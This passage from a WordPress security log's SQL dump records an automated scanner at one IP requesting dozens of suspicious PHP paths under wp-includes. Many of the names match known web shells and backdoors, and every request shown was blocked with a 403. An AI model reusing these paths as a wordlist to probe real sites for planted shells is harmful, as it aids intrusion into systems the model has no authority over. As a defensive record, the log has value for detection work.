php\"}','XK9Yi4ANLuvJxsQ58UByRdWI',0,1674369910.2578,186,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/class-feed-ajax.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/class-feed-ajax.php\"}','4XpLnJrySiVeog2O70mx8C3a',0,1674369910.5974,168,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/class-join.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/class-join.php\"}','Winj2sFQ6LbaA1oZUex5dI3O',0,1674369910.9368,174,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/class-phpmailer-stream.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/class-phpmailer-stream.php\"}','9Tx1MKAOgCZvU6dsSHjRWine',0,1674369911.2900,205,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/class-walker-category-dropdown-ajax-response.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/class-walker-category-dropdown-ajax-response.php\"}','mkv0rIaAt7N8ngQb4XZUPzTE',0,1674369911.6683,164,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/class-wp-cdomize-admin.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/class-wp-cdomize-admin.php\"}','lwMJc0HIjVYfO1orWdS6A2vB',0,1674369911.9850,171,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/class-wp-customize-control-wp.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/class-wp-customize-control-wp.php\"}','fKiunt0UFGzN9wRQc1v6MCXx',0,1674369912.3326,202,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/class-wp-customize-setting-meta.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/class-wp-customize-setting-meta.php\"}','I9n7MVN8skF0zpcWiJboDSBK',0,1674369912.7041,244,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/class-wp-http-curl-stream.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/class-wp-http-curl-stream.php\"}','hzZcbks9ofBES3J5PWGvKdRu',0,1674369913.1047,174,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/class-wp-http-encoding-ajax.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/class-wp-http-encoding-ajax.php\"}','PByeEAq3zTm7NO8hJaivs2pf',0,1674369913.4319,183,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/class-wp-metadata-lazyloader-ajax.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/class-wp-metadata-lazyloader-ajax.php\"}','cr9gl8QE7ZdoyHJzNvV6qbIC',0,1674369913.7659,177,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/class-wp-metadata-lazyloader-core.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/class-wp-metadata-lazyloader-core.php\"}','rA3meQlJtGs6BhIcyaDbqLCZ',0,1674369914.1099,294,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/class-wp-oembed-controller-private.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/class-wp-oembed-controller-private.php\"}','MpNyx1RVKikhtdA9UjSamIeg',0,1674369914.5643,174,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/class-wp-session-tokens-core.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/class-wp-session-tokens-core.php\"}','qmJwVbplkCjh9PLG7EUDiuYn',0,1674369914.8976,155,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/class-wp-simplepie-sanitize-kses-cron.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/class-wp-simplepie-sanitize-kses-cron.php\"}','h6NQupiWDK0sU7OcxbAjaknV',0,1674369915.2037,167,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/class-wp-upgrade.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/class-wp-upgrade.php\"}','OfEHT2VJlwsIZ9N0xS5kAa1j',0,1674369915.5296,168,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/class-wp-uploads.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/class-wp-uploads.php\"}','BxTX1ZckF0d46GuN9mSqJagC',0,1674369915.8564,168,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/class-wp-user-request-meta.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/class-wp-user-request-meta.php\"}','RktFTW4p6vsfx2zOoBGgZd5w',0,1674369916.1882,171,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/class-wp-widget-ajax-response.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/class-wp-widget-ajax-response.php\"}','MLshpowXc5kxbKIaTeRDgd4V',0,1674369916.5284,160,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/class-wp-widget-side.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/class-wp-widget-side.php\"}','FJMfbGEOu4iB0Ug1PRjarmve',0,1674369916.8575,172,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/cof.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/cof.php\"}','o1DurFXq3iE8eVsRySHvhmB2',0,1674369917.1806,202,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/comment-meta.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/comment-meta.php\"}','hnwBYyU12zj6xRcaSDouOiGr',0,1674369917.5722,177,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/compat-ajax-response.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/compat-ajax-response.php\"}','0lWgRUYqMhosHwIkdZQubLv8',0,1674369917.9124,170,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/css.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/css.php\"}','FeQXBnV4fcIpv0Gl1jRL39H5',0,1674369918.2588,171,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/cY4bsE.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/cY4bsE.php\"}','de4iCQpMZkJogEwPlKA7hIGr',0,1674369918.6004,183,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/email.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/email.php\"}','JNIVoqaYXCcMUw3WEb6HTkrh',0,1674369918.9537,185,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/embed-template-core.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/embed-template-core.php\"}','PkJQ6DxmF0KpI8qZSv1Gyhju',0,1674369919.2956,195,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/emusuf.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/emusuf.php\"}','AbEZ8xMLRzjDNwq23Fh5edvT',0,1674369919.6518,167,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/error-protection-cron.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/error-protection-cron.php\"}','nPAOysdYZxN9IHhz0W2Qmv7L',0,1674369919.9699,175,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/feed-rss2-cron.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/feed-rss2-cron.php\"}','jMtcel1PURnhBwLWpK802AGb',0,1674369920.3051,179,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/flickr.class.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/flickr.class.php\"}','KFGWPpcEvfSn6z2sjMtUhryk',0,1674369920.6357,165,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/gindex.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/gindex.php\"}','neJ0NFIuMwZWPEg5zmGKLoV6',0,1674369920.9522,176,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/GOj9m.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/GOj9m.php\"}','uJz9eK4lRC2Mh57oAwjxPUbr',0,1674369921.2967,283,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/Hk.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/Hk.php\"}','KNQnhbrG3WmwAMp9LZgd1jB7',0,1674369921.7502,167,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/includes.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/includes.php\"}','pSYQMn0m6utUJRkibCVoa4xD',0,1674369922.0776,191,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/json.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/json.php\"}','5pZoGR9YdcqgFJrtM2jbh3TC',0,1674369922.4296,169,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/jvc.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/jvc.php\"}','zLDJTBIrOlyECavkdhe7XSi0',0,1674369922.7509,158,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/kab.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/kab.php\"}','akZ6KCwq98cHgb37tijxzvYm',0,1674369923.0604,186,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/ms_config.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/ms_config.php\"}','TyQa3xE1W8tJwbrKnlZCNOMp',0,1674369923.4121,225,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/nav-menu-private.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/nav-menu-private.php\"}','W9q6MjDF2naexXRbTYOyr4HN',0,1674369923.7968,235,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/notice.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/notice.php\"}','L8Sg5QIr6eChv9qb1f7jnwst',0,1674369924.1916,183,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/options-index.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/options-index.php\"}','YE80H2SZCrhVWJqOUemsXAN4',0,1674369924.5348,202,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/PR1eg.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/PR1eg.php\"}','bLCVJUxXzOPt2KiyBgoacWmu',0,1674369924.9199,198,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/programa_apoyo_editoriales.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/programa_apoyo_editoriales.php\"}','q6NIxkQrAEci5ZnvBWYSjt2L',0,1674369925.2695,275,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/revision-meta.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/revision-meta.php\"}','s34F7dDvw8XW5KjPaZpUNnOC',0,1674369925.7155,207,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/revo.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/revo.php\"}','ZP3O7kM5o0LANHvy8bY4tS96',0,1674369926.0732,179,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/RxR_iblkjmoy.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/RxR_iblkjmoy.php\"}','YcROnjpgeFIVbUiNBT8LEkSs',0,1674369926.4216,169,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/safeparam-doctype.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/safeparam-doctype.php\"}','HvQwngm5GLqCKlstPO1j6IBb',0,1674369926.7507,176,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/seo.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/seo.php\"}','no21R5EcF8j63LGUhMsgyzuI',0,1674369927.0921,171,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/settings.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/settings.php\"}','aEzrLyixtgfmKs41W9B7Nk6l',0,1674369927.4144,173,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/shell20211028.php.suspected','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/shell20211028.php.suspected\"}','O10Py45V7eDTa98JwsCvYG3q',0,1674369927.7684,199,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/sidwso.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/sidwso.php\"}','90MBfVPHTrnONZpzKYbjG78y',0,1674369928.1289,176,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/sk.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/sk.php\"}','V8iP1esTDm6WEzxpYChLZSd2',0,1674369928.4757,215,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/system.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/system.php\"}','iJMQrU6fCoyBnSklVRmIYchP',0,1674369928.8513,169,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/tax2.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/tax2.php\"}','aJ8CXroWkQL0dA6OVt1jU5YK',0,1674369929.1989,170,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/trio-kece.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/trio-kece.php\"}','BvgjOUi4fwbHW3SPEmhzrntk',0,1674369929.5290,183,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/uplaod.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/uplaod.php\"}','jdp8Frc7ktWliU5vwOyHMzCo',0,1674369929.8639,171,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/uploadzip.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/uploadzip.php\"}','0UsBlh3CPbL2YvRjAwxzWdMJ',0,1674369930.2016,196,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/user-cron.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/user-cron.php\"}','1AuGbVjn5oeEd7LH0FU9hk6P',0,1674369930.5495,186,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/users.php.suspected','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/users.php.suspected\"}','Q18GiDgoHMX5KnYOmSvrNwe7',0,1674369930.8886,186,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/vjgtd8LW.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/vjgtd8LW.php\"}','kj1D8CHVP0WKtYM9rpB7buAz',0,1674369931.2302,186,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/wp-2019.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/wp-2019.php\"}','SzuXnBlT6wIMDgchyfxaGZko',0,1674369931.5763,193,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/wp-class.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/wp-class.php\"}','M9hW82zE51Z0Ork6AaXSFneQ',0,1674369931.9345,211,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/wp-gypqic.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/wp-gypqic.php\"}','Llzfo4TjFcvxEebN1aVW65kB',0,1674369932.3347,215,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/wp-includes/admin-bar.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/wp-includes\\/admin-bar.php\"}','9zEmphcrUQxbuTqn0jDZJ5MY',0,1674369932.7230,175,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/wp-log.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/wp-log.php\"}','aYnCuBDKM0XmbljgpQ1cN8iS',0,1674369933.0710,185,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/wp-logs.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/wp-logs.php\"}','nXdOWP6qbkmGiBuAYf3HJT2R',0,1674369933.4365,182,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/wp-mail.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/wp-mail.php\"}','8yp1dWUnNr6azhBVFKxIv2RL',0,1674369933.7772,190,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/wp-type.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/wp-type.php\"}','4byRYHX3NIjU0epDK5LMGTAk',0,1674369934.1318,197,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/wpspl-load-compat.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/wpspl-load-compat.php\"}','xhkNECZqAUvoPIBDuaJcHrT2',0,1674369934.7031,168,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/wsoyanzorng.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/wsoyanzorng.php\"}','hHF6TilydN1wzaIQS48PDket',0,1674369935.0226,161,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/assets/alfa4.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/assets\\/alfa4.php\"}','WhXlSdgwzAmLQi9IoGn2PUE3',0,1674369935.3329,187,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/block-supports/layout-ajax-response.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/block-supports\\/layout-ajax-response.php\"}','aZ13fL5vtc7M2p9JEGwjHToi',0,1674369935.6762,196,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/certificates/comments-popup.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/certificates\\/comments-popup.php\"}','pAjzC14ZFlMeNcL7H0VTRvBE',0,1674369936.0248,170,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/certificates/image_type_to_mime_type.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/certificates\\/image_type_to_mime_type.php\"}','T8c3NIdO04pnBZxPCe7JHXzS',0,1674369936.3516,167,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/certificates/submenu-pspell.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/certificates\\/submenu-pspell.php\"}','d3KDvTnWfhY40cuHPqilegJG',0,1674369936.6682,178,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/certificates/wp-conflg.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/certificates\\/wp-conflg.php\"}','skoIprQExJPLvgWKj9Aqlt24',0,1674369937.0043,185,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/certificates/wp-signup.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/certificates\\/wp-signup.php\"}','ZwtBm5FM2AxGuT9qWjs1HiJO',0,1674369937.3453,238,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/css/01%20copy.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/css\\/01%20copy.php\"}','W2rCmOB4nvs7KwMYxLDuP8G9',0,1674369937.7567,211,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/css/01589a.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/css\\/01589a.php\"}','QmR1JGWFOH40Z9VAlLtfUvsT',0,1674369938.1218,170,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/css/88981.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/css\\/88981.php\"}','DeK3QiE40OqRXdYVk9CpFsgZ',0,1674369938.4413,204,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/css/bimowdoodk.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/css\\/bimowdoodk.php\"}','r6xTQ7twsRikBvfVn8bOAJpP',0,1674369938.9150,221,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-